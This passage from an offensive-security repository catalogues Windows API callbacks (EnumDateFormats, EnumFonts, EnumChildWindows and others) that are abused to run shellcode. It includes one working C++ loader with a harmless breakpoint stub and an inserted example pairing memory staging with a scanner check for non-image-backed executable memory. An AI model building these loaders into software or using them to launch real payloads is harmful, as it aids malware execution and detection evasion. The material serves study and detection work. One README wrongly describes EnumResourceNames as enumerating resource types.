--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `DirectSoundEnumerate`. `lpDSEnumCallback` is invoked once per DirectSound rendering device.
```c++
HRESULT DirectSoundEnumerate(LPDSENUMCALLBACK lpDSEnumCallback, LPVOID lpContext);
```

### Reference

- [MSDN DirectSoundEnumerate](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ee416763(v=vs.85))
--------------------------------------------------------------------------------
/windows/execution/callback/DrawState/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `DrawState`. `qfnCallBack` is used only when `uFlags` contains `DST_COMPLEX`; `DrawState` then calls it (with `lData` and `wData`) to render the image, so a valid `HDC` is required.

```c++
BOOL DrawStateA(HDC hdc, HBRUSH hbrFore, DRAWSTATEPROC qfnCallBack, LPARAM lData, WPARAM wData, int x, int y, int cx, int cy, UINT uFlags);

BOOL DrawStateW(HDC hdc, HBRUSH hbrFore, DRAWSTATEPROC qfnCallBack, LPARAM lData, WPARAM wData, int x, int y, int cx, int cy, UINT uFlags);
```

### Reference

- [MSDN DrawStateA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-drawstatea)
- [MSDN DrawStateW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-drawstatew)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumCalendarInfo/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumCalendarInfo`. `lpCalInfoEnumProc` is invoked once per calendar info string of the requested type for the locale, so the payload runs with an `LPSTR`/`LPWSTR` as its only argument.
```c++
BOOL EnumCalendarInfoA(CALINFO_ENUMPROCA lpCalInfoEnumProc, LCID Locale, CALID Calendar, CALTYPE CalType);

BOOL EnumCalendarInfoW(CALINFO_ENUMPROCW lpCalInfoEnumProc, LCID Locale, CALID Calendar, CALTYPE CalType);
```

### Reference

- [MSDN EnumCalendarInfoA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoa)
- [MSDN EnumCalendarInfoW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfow)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumCalendarInfoEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumCalendarInfoEx`. Same as `EnumCalendarInfo`, but the callback also receives the calendar identifier.

```c++
BOOL EnumCalendarInfoExA(CALINFO_ENUMPROCEXA lpCalInfoEnumProcEx, LCID Locale, CALID Calendar, CALTYPE CalType);

BOOL EnumCalendarInfoExW(CALINFO_ENUMPROCEXW lpCalInfoEnumProcEx, LCID Locale, CALID Calendar, CALTYPE CalType);
```

### Reference

- [MSDN EnumCalendarInfoExA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoexa)
- [MSDN EnumCalendarInfoExW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoexw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumCalendarInfoExEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumCalendarInfoExEx`. The locale is given by name (`lpLocaleName`, for example `LOCALE_NAME_USER_DEFAULT`) rather than LCID, and `lParam` is passed through to the callback.
```c++
BOOL EnumCalendarInfoExEx(CALINFO_ENUMPROCEXEX pCalInfoEnumProcExEx, LPCWSTR lpLocaleName, CALID Calendar, LPCWSTR lpReserved, CALTYPE CalType, LPARAM lParam);
```

### Reference

- [MSDN EnumCalendarInfoExEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoexex)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumChildWindows/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumChildWindows`. `lpEnumFunc` is called once per child window of `hWndParent`; with `hWndParent` set to `NULL` the call behaves like `EnumWindows` and walks every top-level window, so it does nothing in a session without windows.

```c++
BOOL EnumChildWindows(HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam);
```

### Reference

- [MSDN EnumChildWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumchildwindows)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumDateFormats/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumDateFormats`. `lpDateFmtEnumProc` is invoked once per date format string available for the locale (`dwFlags` selects short, long or year/month formats).
```c++
BOOL EnumDateFormatsA(DATEFMT_ENUMPROCA lpDateFmtEnumProc, LCID Locale, DWORD dwFlags);

BOOL EnumDateFormatsW(DATEFMT_ENUMPROCW lpDateFmtEnumProc, LCID Locale, DWORD dwFlags);
```

### Reference

- [MSDN EnumDateFormatsA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsa)
- [MSDN EnumDateFormatsW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumDateFormats/c++/code.cpp:
--------------------------------------------------------------------------------
/*
    Shellcode Loader
    Archive of Reversing.ID

    Abusing windows API to run shellcode as callback.

Compile:
    $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp

Technique:
    - allocation: VirtualAlloc
    - writing: RtlMoveMemory
    - permission: VirtualProtect
    - execution: EnumDateFormats
*/

#include <windows.h>
#include <stdint.h>

int main ()
{
    void * runtime;
    BOOL retval;
    DWORD old_protect = 0;

    // shellcode storage in stack (nop; nop; int3; ret -- a breakpoint, not a real payload)
    uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 };
    uint32_t payload_len = 4;

    // allocate memory buffer for payload as READ-WRITE (no executable)
    runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (runtime == NULL)
        return 1;

    // copy payload to the buffer
    RtlMoveMemory (runtime, payload, payload_len);

    // make buffer executable (R-X); the page is never writable and executable at once
    retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect);
    if (retval != 0)
    {
        // EnumDateFormats calls the "callback" once per date format of the locale
        EnumDateFormats ((DATEFMT_ENUMPROCA)runtime, LOCALE_SYSTEM_DEFAULT, 0);
    }

    // deallocate the space; with MEM_RELEASE the size argument must be 0
    VirtualFree (runtime, 0, MEM_RELEASE);

    return 0;
}
--------------------------------------------------------------------------------
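The sequence every README on this page relies on, from the `VirtualAlloc`/`VirtualAllocEx` allocation notes above through the callback-based execution entries that follow, is the same four steps: allocate read-write, copy the bytes in, flip the page to execute-read, then hand the address to something that will call it. The block below is an added example, not code from the Reversing.ID repository, and it adds the check a memory scanner applies to such a callback target: whether the address is backed by a loaded image (`VirtualQuery` reporting `MEM_IMAGE`) or by private memory. It assumes a 64-bit x86 or AArch64 build. On Windows it uses the page's `VirtualAlloc`/`VirtualProtect`/`VirtualFree` calls and `EnumChildWindows` as the callback slot; on other systems (an assumption added so the block also builds there) it uses `mmap`/`mprotect` and a `/proc/self/maps` lookup. The payload bytes are constructed for the example (machine code for `return 42`), not shellcode from the repo.

```c
/* Added example (not from the Reversing.ID repo): RW -> RX staging plus the
   "is this callback target image-backed?" check a scanner performs. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1            /* MAP_ANONYMOUS on glibc */
#endif
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#else
#include <sys/mman.h>
#include <unistd.h>
#endif

/* Constructed payload: the machine code for "return 42". A bare return keeps
   it independent of the calling convention of whichever API invokes it. */
#if defined(__x86_64__) || defined(_M_X64)
static const uint8_t PAYLOAD[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 };             /* mov eax,42 ; ret */
#elif defined(__aarch64__) || defined(_M_ARM64)
static const uint8_t PAYLOAD[] = { 0x40, 0x05, 0x80, 0x52, 0xC0, 0x03, 0x5F, 0xD6 }; /* mov w0,#42 ; ret */
#else
#error "no payload encoded for this architecture"
#endif
static const size_t PAYLOAD_LEN = sizeof PAYLOAD;

typedef int (*payload_fn)(void);

/* Round a length up to whole pages; mprotect/munmap want page multiples. */
static size_t page_round(size_t len)
{
#ifdef _WIN32
    SYSTEM_INFO si;
    GetSystemInfo(&si);
    size_t page = si.dwPageSize;
#else
    size_t page = (size_t)sysconf(_SC_PAGESIZE);
#endif
    return (len + page - 1) / page * page;
}

/* Allocate RW, copy, flip to RX. The buffer is never writable and executable
   at the same time. Returns NULL on failure. */
void *stage_payload(const uint8_t *code, size_t len)
{
#ifdef _WIN32
    DWORD old = 0;
    void *mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (mem == NULL) return NULL;
    memcpy(mem, code, len);
    if (!VirtualProtect(mem, len, PAGE_EXECUTE_READ, &old)) {
        VirtualFree(mem, 0, MEM_RELEASE);           /* dwSize must be 0 with MEM_RELEASE */
        return NULL;
    }
    FlushInstructionCache(GetCurrentProcess(), mem, len);
    return mem;
#else
    size_t size = page_round(len);
    void *mem = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return NULL;
    memcpy(mem, code, len);
    if (mprotect(mem, size, PROT_READ | PROT_EXEC) != 0) {
        munmap(mem, size);
        return NULL;
    }
    __builtin___clear_cache((char *)mem, (char *)mem + len);  /* required on AArch64 */
    return mem;
#endif
}

void release_payload(void *mem, size_t len)
{
#ifdef _WIN32
    (void)len;
    VirtualFree(mem, 0, MEM_RELEASE);
#else
    munmap(mem, page_round(len));
#endif
}

/* Scanner-side check: 1 = address backed by a loaded image/file, 0 = anonymous
   or private memory, -1 = could not tell. On Windows this is VirtualQuery's
   MEM_IMAGE vs MEM_PRIVATE; on Linux the mapping line in /proc/self/maps
   either ends in a file path or does not. */
int is_image_backed(uintptr_t addr)
{
#ifdef _WIN32
    MEMORY_BASIC_INFORMATION mbi;
    if (VirtualQuery((LPCVOID)addr, &mbi, sizeof mbi) == 0) return -1;
    return mbi.Type == MEM_IMAGE ? 1 : 0;
#else
    FILE *maps = fopen("/proc/self/maps", "r");
    char line[512];
    if (maps == NULL) return -1;
    while (fgets(line, sizeof line, maps) != NULL) {
        unsigned long lo, hi, off, ino;
        char perms[8], dev[16], path[256];
        int n = sscanf(line, "%lx-%lx %7s %lx %15s %lu %255s", &lo, &hi, perms, &off, dev, &ino, path);
        if (n < 6 || addr < lo || addr >= hi) continue;
        fclose(maps);
        return (n == 7 && path[0] == '/') ? 1 : 0;  /* "[heap]"/"[stack]"/no path => not an image */
    }
    fclose(maps);
    return -1;
#endif
}

/* Stage the constructed payload and run it through a function pointer.
   Returns the payload's return value, or -1 if staging failed. */
int run_staged_payload(void)
{
    payload_fn fn;
    int result;
    void *mem = stage_payload(PAYLOAD, PAYLOAD_LEN);
    if (mem == NULL) return -1;
    memcpy(&fn, &mem, sizeof fn);   /* object pointer -> function pointer without a direct cast */
    result = fn();
    release_payload(mem, PAYLOAD_LEN);
    return result;
}

#ifdef _WIN32
/* The repo's way in: hand the RX buffer to a callback slot. With a NULL parent
   EnumChildWindows behaves like EnumWindows and calls the payload once per
   top-level window, so it runs nothing in a session without windows. */
BOOL run_via_callback(void *mem)
{
    return EnumChildWindows(NULL, (WNDENUMPROC)mem, 0);
}
#endif

int main(void)
{
    void *mem = stage_payload(PAYLOAD, PAYLOAD_LEN);
    printf("payload returned %d\n", run_staged_payload());
    printf("staged buffer image-backed: %d, this executable's code: %d\n",
           is_image_backed((uintptr_t)mem), is_image_backed((uintptr_t)&run_staged_payload));
    release_payload(mem, PAYLOAD_LEN);
    return 0;
}
```

The second `printf` line is the point of the example: the staged buffer reports 0 and the program's own code reports 1, and an executable region that is not image-backed being handed to an API's callback parameter is precisely what in-memory scanners flag, regardless of which of the enumeration functions on this page is used to make the call.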
/windows/execution/callback/EnumDateFormatsEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumDateFormatsEx`. Same as `EnumDateFormats`, but the callback also receives the calendar identifier of each format.

```c++
BOOL EnumDateFormatsExA(DATEFMT_ENUMPROCEXA lpDateFmtEnumProcEx, LCID Locale, DWORD dwFlags);

BOOL EnumDateFormatsExW(DATEFMT_ENUMPROCEXW lpDateFmtEnumProcEx, LCID Locale, DWORD dwFlags);
```

### Reference

- [MSDN EnumDateFormatsExA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsexa)
- [MSDN EnumDateFormatsExW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsexw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumDateFormatsExEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumDateFormatsExEx`. The locale is given by name rather than LCID, and `lParam` is passed through to the callback.

```c++
BOOL EnumDateFormatsExEx(DATEFMT_ENUMPROCEXEX lpDateFmtEnumProcExEx, LPCWSTR lpLocaleName, DWORD dwFlags, LPARAM lParam);
```

### Reference

- [MSDN EnumDateFormatsExEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsexex)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumDesktopWindows/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumDesktopWindows`. `lpfn` is called once per top-level window on `hDesktop` (`NULL` means the calling thread's current desktop), so a desktop with no windows never reaches the payload.
```c++
BOOL EnumDesktopWindows(HDESK hDesktop, WNDENUMPROC lpfn, LPARAM lParam);
```

### Reference

- [MSDN EnumDesktopWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdesktopwindows)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumDesktops/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumDesktops`. `lpEnumFunc` is called once per desktop in the window station `hwinsta` (`NULL` means the current window station); the callback receives the desktop name as its first argument.

```c++
BOOL EnumDesktopsA(HWINSTA hwinsta, DESKTOPENUMPROCA lpEnumFunc, LPARAM lParam);

BOOL EnumDesktopsW(HWINSTA hwinsta, DESKTOPENUMPROCW lpEnumFunc, LPARAM lParam);
```

### Reference

- [MSDN EnumDesktopsA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdesktopsa)
- [MSDN EnumDesktopsW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdesktopsw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumDirTree/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumDirTree` (dbghelp). `hProcess` must first be initialized with `SymInitialize`; `cb` is then invoked for each file under `RootPath` that matches `InputPathName`, so the path must match at least one file.
```c++
BOOL IMAGEAPI EnumDirTree(HANDLE hProcess, PCSTR RootPath, PCSTR InputPathName, PSTR OutputPathBuffer, PENUMDIRTREE_CALLBACK cb, PVOID data);

BOOL IMAGEAPI EnumDirTreeW(HANDLE hProcess, PCWSTR RootPath, PCWSTR InputPathName, PWSTR OutputPathBuffer, PENUMDIRTREE_CALLBACKW cb, PVOID data);

BOOL IMAGEAPI SymInitialize(HANDLE hProcess, PCSTR UserSearchPath, BOOL fInvadeProcess);
```

### Reference

- [MSDN EnumDirTree](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumdirtree)
- [MSDN EnumDirTreeW](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumdirtreew)
- [MSDN SymInitialize](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-syminitialize)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumDisplayMonitors/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumDisplayMonitors`. `lpfnEnum` is called once per display monitor intersecting the clipping rectangle; with `hdc` and `lprcClip` both `NULL` it covers every monitor on the virtual screen.

```c++
BOOL EnumDisplayMonitors(HDC hdc, LPCRECT lprcClip, MONITORENUMPROC lpfnEnum, LPARAM dwData);
```

### Reference

- [MSDN EnumDisplayMonitors](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdisplaymonitors)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumFontFamilies/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumFontFamilies`. `lpProc` is called once per font family available on the device context; `GetDC(NULL)` yields a DC for the whole screen, and `lpLogfont` set to `NULL` selects a random family from each available family.
```c++
int EnumFontFamiliesA(HDC hdc, LPCSTR lpLogfont, FONTENUMPROCA lpProc, LPARAM lParam);

int EnumFontFamiliesW(HDC hdc, LPCWSTR lpLogfont, FONTENUMPROCW lpProc, LPARAM lParam);

HDC GetDC(HWND hWnd);
```

### Reference

- [MSDN EnumFontFamiliesA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesa)
- [MSDN EnumFontFamiliesW](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesw)
- [MSDN GetDC](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getdc)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumFontFamiliesEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumFontFamiliesEx`. Like `EnumFontFamilies`, but the filter is a `LOGFONT` structure (its `lfCharSet`, `lfFaceName` and `lfPitchAndFamily` members are honoured) and `dwFlags` is reserved and must be 0.

```c++
int EnumFontFamiliesExA(HDC hdc, LPLOGFONTA lpLogfont, FONTENUMPROCA lpProc, LPARAM lParam, DWORD dwFlags);

int EnumFontFamiliesExW(HDC hdc, LPLOGFONTW lpLogfont, FONTENUMPROCW lpProc, LPARAM lParam, DWORD dwFlags);

HDC GetDC(HWND hWnd);
```

### Reference

- [MSDN EnumFontFamiliesExA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesexa)
- [MSDN EnumFontFamiliesExW](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontfamiliesexw)
- [MSDN GetDC](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getdc)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumFonts/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumFonts`. This is the older form of `EnumFontFamilies`: `lpProc` is called once per font on the device context, and `GetDC(NULL)` provides a screen DC.

```c++
int EnumFontsA (HDC hdc, LPCSTR lpLogfont, FONTENUMPROCA lpProc, LPARAM lParam);

int EnumFontsW (HDC hdc, LPCWSTR lpLogfont, FONTENUMPROCW lpProc, LPARAM lParam);

HDC GetDC (HWND hWnd);
```

### Reference

- [MSDN EnumFontsA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontsa)
- [MSDN EnumFontsW](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumfontsw)
- [MSDN GetDC](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getdc)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumLanguageGroupLocales/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumLanguageGroupLocales`.

```c++
BOOL EnumLanguageGroupLocalesA (LANGGROUPLOCALE_ENUMPROCA lpLangGroupLocaleEnumProc, LGRPID LanguageGroup, DWORD dwFlags, LONG_PTR lParam);

BOOL EnumLanguageGroupLocalesW (LANGGROUPLOCALE_ENUMPROCW lpLangGroupLocaleEnumProc, LGRPID LanguageGroup, DWORD dwFlags, LONG_PTR lParam);
```

### Reference

- [MSDN EnumLanguageGroupLocalesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumlanguagegrouplocalesa)
- [MSDN EnumLanguageGroupLocalesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumlanguagegrouplocalesw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumMetaFile/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumMetaFile`.

```c++
BOOL EnumMetaFile (HDC hdc, HMETAFILE hmf, MFENUMPROC proc, LPARAM param);
```

### Reference

- [MSDN EnumMetaFile](https://learn.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enummetafile)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumObjects/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumObjects`.

```c++
int EnumObjects (HDC hdc, int nType, GOBJENUMPROC lpFunc, LPARAM lParam);
```

### Reference

- [MSDN EnumObjects](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumobjects)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumPageFiles/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumPageFiles`.

```c++
BOOL EnumPageFilesA (PENUM_PAGE_FILE_CALLBACKA pCallBackRoutine, LPVOID pContext);

BOOL EnumPageFilesW (PENUM_PAGE_FILE_CALLBACKW pCallBackRoutine, LPVOID pContext);
```

### Reference

- [MSDN EnumPageFilesA](https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumpagefilesa)
- [MSDN EnumPageFilesW](https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumpagefilesw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumProps/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumProps`.

```c++
int EnumPropsA (HWND hWnd, PROPENUMPROCA lpEnumFunc);

int EnumPropsW (HWND hWnd, PROPENUMPROCW lpEnumFunc);

BOOL SetPropA (HWND hWnd, LPCSTR lpString, HANDLE hData);

BOOL SetPropW (HWND hWnd, LPCWSTR lpString, HANDLE hData);

HANDLE RemovePropA (HWND hWnd, LPCSTR lpString);

HANDLE RemovePropW (HWND hWnd, LPCWSTR lpString);
```

### Reference

- [MSDN EnumPropsA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumpropsa)
- [MSDN EnumPropsW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumpropsw)
- [MSDN SetPropA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setpropa)
- [MSDN SetPropW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setpropw)
- [MSDN RemovePropA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-removepropa)
- [MSDN RemovePropW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-removepropw)
- [MSDN GetTopWindow](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-gettopwindow)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumPropsEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumPropsEx`.

```c++
int EnumPropsExA (HWND hWnd, PROPENUMPROCEXA lpEnumFunc, LPARAM lParam);

int EnumPropsExW (HWND hWnd, PROPENUMPROCEXW lpEnumFunc, LPARAM lParam);

BOOL SetPropA (HWND hWnd, LPCSTR lpString, HANDLE hData);

BOOL SetPropW (HWND hWnd, LPCWSTR lpString, HANDLE hData);

HANDLE RemovePropA (HWND hWnd, LPCSTR lpString);

HANDLE RemovePropW (HWND hWnd, LPCWSTR lpString);
```

### Reference

- [MSDN EnumPropsExA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumpropsexa)
- [MSDN EnumPropsExW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumpropsexw)
- [MSDN SetPropA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setpropa)
- [MSDN SetPropW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setpropw)
- [MSDN RemovePropA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-removepropa)
- [MSDN RemovePropW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-removepropw)
- [MSDN GetTopWindow](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-gettopwindow)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumPwrSchemes/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumPwrSchemes`.

```c++
BOOLEAN EnumPwrSchemes (PWRSCHEMESENUMPROC lpfn, LPARAM lParam);
```

### Reference

- [MSDN EnumPwrSchemes](https://docs.microsoft.com/en-us/windows/win32/api/powrprof/nf-powrprof-enumpwrschemes)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceLanguages/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumResourceLanguages`.

```c++
BOOL EnumResourceLanguagesA (HMODULE hModule, LPCSTR lpType, LPCSTR lpName, ENUMRESLANGPROCA lpEnumFunc, LONG_PTR lParam);

BOOL EnumResourceLanguagesW (HMODULE hModule, LPCWSTR lpType, LPCWSTR lpName, ENUMRESLANGPROCW lpEnumFunc, LONG_PTR lParam);
```

### Reference

- [MSDN EnumResourceLanguagesA](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcelanguagesa)
- [MSDN EnumResourceLanguagesW](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcelanguagesw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceLanguages/c++/resources.h:
--------------------------------------------------------------------------------
#define REVID_STRING 1
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceLanguages/c++/resources.rc:
--------------------------------------------------------------------------------
#include "resources.h"

STRINGTABLE
BEGIN
    REVID_STRING, "ReversingID"
END
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNames/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumResourceNames`.

Enumerate the resource types within a module and run a callback to process each resource type identified.

```c++
BOOL EnumResourceNamesA (HMODULE hModule, LPCSTR lpType, ENUMRESNAMEPROCA lpEnumFunc, LONG_PTR lParam);

BOOL EnumResourceNamesW (HMODULE hModule, LPCWSTR lpType, ENUMRESNAMEPROCW lpEnumFunc, LONG_PTR lParam);
```

### Reference

- [MSDN EnumResourceNamesA](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesa)
- [MSDN EnumResourceNamesW](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNames/c++/resource-self/resources.h:
--------------------------------------------------------------------------------
#define SHELLCODE 100
#define ID_STRING 101
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNames/c++/resource-self/resources.rc:
--------------------------------------------------------------------------------
#include "resources.h"

SHELLCODE RCDATA shellcode.bin

STRINGTABLE
BEGIN
    ID_STRING "Reversing.ID Shellcode Loader"
END
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNames/c++/resource-self/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/execution/callback/EnumResourceNames/c++/resource-self/shellcode.bin
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNamesEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Shellcode execution using `EnumResourceNamesEx`.

Enumerate the resource types within a module and run a callback to process each resource type identified.

```c++
BOOL EnumResourceNamesExA (HMODULE hModule, LPCSTR lpType, ENUMRESNAMEPROCA lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId);

BOOL EnumResourceNamesExW (HMODULE hModule, LPCWSTR lpType, ENUMRESNAMEPROCW lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId);
```

### Reference

- [MSDN EnumResourceNamesExA](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesexa)
- [MSDN EnumResourceNamesExW](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesexw)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNamesEx/c++/resource-self/resources.h:
--------------------------------------------------------------------------------
#define SHELLCODE 100
#define ID_STRING 101
--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNamesEx/c++/resource-self/resources.rc:
--------------------------------------------------------------------------------
#include "resources.h"

SHELLCODE RCDATA shellcode.bin

STRINGTABLE
BEGIN
    ID_STRING "Reversing.ID Shellcode Loader"
END
--------------------------------------------------------------------------------
